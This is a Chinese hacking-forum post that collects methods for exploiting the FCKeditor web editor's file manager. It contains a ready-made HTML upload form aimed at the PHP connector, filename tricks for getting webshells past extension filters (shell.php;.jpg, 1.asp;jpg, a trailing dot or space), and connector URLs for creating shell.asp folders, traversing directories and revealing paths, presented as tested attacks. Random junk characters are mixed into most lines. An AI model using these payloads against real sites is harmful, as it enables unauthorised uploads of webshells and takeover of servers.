找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Fckeditor漏洞 (2)
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2297|回复: 0
打印 上一主题 下一主题

Fckeditor漏洞 (2)

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:01:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结  - x6 S% z; p9 K
查看编辑器版本
1 }( `7 H8 j7 fFCKeditor/_whatsnew.html  b: f1 E/ O8 ]/ x2 T& O$ ^) \
—————————————————————————————————————————————————————————————
1 z# P- X; s5 ?8 j! z6 A  [
" e/ R& F+ Z3 u2. Version 2.2 版本
( Q" \5 Y' d/ s2 w# x$ \' }) {) x! s) aApache+linux 环境下在上传文件后面加个.突破!测试通过。* R2 v- x' }& Y- _2 d2 E: s' p/ K
—————————————————————————————————————————————————————————————
1 i, e; U# C& H$ y: N, f2 H
& F0 q# [2 d2 l9 G3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
) P" n' A0 e" l  ]$ }/ @<form id="frmUpload" enctype="multipart/form-data"
) ^3 ?# \/ |, n# p2 Laction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
4 o; `5 }' j) v. U<input type="file" name="NewFile" size="50"><br>. |0 Y* i3 l- v
<input id="btnUpload" type="submit" value="Upload">
' r4 r' i" m; E4 `</form>8 s  A6 e0 E- A8 {
—————————————————————————————————————————————————————————————
" W# a9 h$ M% E# J2 t2 ^# `9 M) C
8 X  [& v0 d- P6 A/ q+ B4 r4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
  T2 a" `; @0 y% N        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
0 V0 G. W9 h- B" k    4.1:提交shell.php+空格绕过
; v; l3 L' p9 z+ p! }1 x  G% L! S不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。1 Z1 R6 l6 V- z
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
! }: w/ `" `6 i* Z& ?$ i, i—————————————————————————————————————————————————————————————
. ~) e' s  I, l! A0 _' R' N& ^5 G; b# x# m! J
5. 突破建立文件夹
  c' n8 C! i. Q, YFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
, J0 J5 ~% a- W& uFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp/ H1 ]+ l9 M9 @0 K
—————————————————————————————————————————————————————————————" u6 P9 p; h7 {$ h7 e" @4 k

. \( R8 G4 }* s) a6. FCKeditor 中test 文件的上传地址
2 A) ^, X1 U" V" vFCKeditor/editor/filemanager/browser/default/connectors/test.html
, {9 G+ C& T3 {. [6 Y5 B$ e) i  aFCKeditor/editor/filemanager/upload/test.html6 D) O' Y7 V4 Y+ T/ {
FCKeditor/editor/filemanager/connectors/test.html* q' v2 G6 u) A" V
FCKeditor/editor/filemanager/connectors/uploadtest.html
9 ?  N9 J2 s, X—————————————————————————————————————————————————————————————
& Y" u: U6 j- ~% Y8 [# S! K" ]2 Q/ K" \5 ], Q( @' F" i" g+ y
7.常用上传地址$ X  `  r4 s( F/ V' z  G2 u
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
* }+ G- o+ ^  AFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
& w9 S) t0 f+ I  e  ~7 r- H! D% y: IFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)( \' T0 o: F# G+ {' q) }# _
JSP 版:
1 o  h5 q  K5 z. k; CFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp1 f; ^" X; h& X
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
- e; ^% C/ }3 _4 E' F件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。1 H$ k+ f1 V* N5 Z* A2 p& k
—————————————————————————————————————————————————————————————8 \; i' Y# a6 u. J/ w' ~2 m! \

8 d$ [: ?3 Z( E" U- y8.其他上传地址0 W* i1 G3 w$ o. D2 }$ Q: Q) y
FCKeditor/_samples/default.html& d  p7 v1 C% R  C! r
FCKeditor/_samples/asp/sample01.asp: W, Q! b, l  e2 \
FCKeditor/_samples/asp/sample02.asp
1 K! R9 Z" V2 z# f- z7 o' i* }* VFCKeditor/_samples/asp/sample03.asp/ h, |5 L3 d7 f0 h- P* m6 {
FCKeditor/_samples/asp/sample04.asp8 G+ e* |5 k$ k: L" f( m
一般很多站点都已删除_samples 目录,可以试试。6 n+ L0 V" ~$ O% d7 T' q/ X1 V
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。# U  A- U& k7 K4 P1 [% |
—————————————————————————————————————————————————————————————' K8 ~+ b0 X# O) `) N3 L, ?
) a2 k! B% z' o- g
9.列目录漏洞也可助找上传地址
! a$ e& g$ m/ }: Z5 g$ uVersion 2.4.1 测试通过
  @5 p7 A; T# W0 t% a7 V修改CurrentFolder 参数使用 ../../来进入不同的目录
6 D9 f# g; N: H7 ~9 g$ L2 d- y8 s/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp  T2 K1 f! W7 @+ g: ?, p
根据返回的XML 信息可以查看网站所有的目录。6 [, ^% u+ x. w) V- b: z1 L
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F6 ?; |" X7 v9 P0 {* y6 @' w
也可以直接浏览盘符:4 u) x! L7 }; b7 t5 i  u' p
JSP 版本:4 \; z2 p8 M& \- o9 O2 _
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
5 X2 z8 Q9 Y9 m4 C& q1 S—————————————————————————————————————————————————————————————
" ?) D# `3 p# W9 u" e
  g$ O& F1 w% L  l1 y( j# ]10.爆路径漏洞
6 T! i( @( T; k( p* `: MFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp# P1 h$ k1 L4 }( U1 b
—————————————————————————————————————————————————————————————, f* n* p) M1 o: [+ u/ x
8 J% H" M* R  S% ^0 U3 c" z
11. FCKeditor 被动限制策略所导致的过滤不严问题! X# R' s6 g* R' M  f
        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
& X# N/ G5 n( j! J5 m8 g1 P( g脆弱描述:0 f5 i" G$ T6 t, d
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
+ j  n: K7 o! k% Chtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm( I7 I! c2 W" V7 r& f
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!, x: s9 \  M& y; u" h
        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
' v: H- t+ ^1 C$ K. z4 \        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!$ }5 ]1 Y" \! h$ a' O
—————————————————————————————————————————————————————————————5 Y# |# F. ^; X2 }& I9 @% ?' F

3 k5 T. \: x5 N" d12.最古老的漏洞,Type文件没有限制!& S8 e+ R" k7 W/ t$ u  r
        我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! + b$ w* {3 g6 j! J3 B0 f
—————————————————————————————————————————————————————————————
6 w# y. S# ]! I6 u3 T, T$ B( F/ t/ K. d) e( B
===============================================================================================================================================
6 K  k6 Z' d3 L5 w2 h; A# J+ Z& A: p! A0 O! C
FCK编辑器jsp版本漏洞:
; ]2 w! O$ g& P' W, y. i& l: Q3 H2 j& x6 E2 }

) j) z" A0 L8 P, W! F3 khttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F/ D, G& j+ A& F+ l+ A

) Z! m1 g6 K- l: H5 }/ _上传马所在目录1 U9 w! P  Q. b: p+ C3 a
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
! Y5 m$ @7 E. n% I, C" j% D2 [上传shell的地址:" R6 ?% _8 q9 D% L) i' Q# O
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
, f% k; x. U' R" p跟版本有关系.并不是百分百成功. 测试成功几个站.
( Q; U5 [0 r9 k5 E( r/ t不能通杀.很遗憾.
3 y. v1 U4 L( |. {, l* ]http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
4 w5 Z. C+ _6 F5 q如果以上地址不行可以试试
2 J: z  T! e! Y$ vFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
9 r* a! r; c  T% eFCKeditor/_samples/
& c- K9 i' v" Q/ m$ xFCKeditor/_samples/default.html% D. ]) {3 l, M0 H+ B4 ~2 _
FCKeditor/editor/fckeditor.htm, B% J$ _! Z* e- a$ z4 O
FCKeditor/editor/fckdialog.html1 K5 E) A2 H! |; _/ @9 z% V
' H) I/ Q8 c" W

3 K! S; Y0 w/ c9 F& x! i- c6 w0 f) L% n3 o3 u- l; L1 j
解析漏洞+未重命名文件时上传漏洞  1.asp;jpg
$ |' q; I5 W7 z7 ]7 @
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表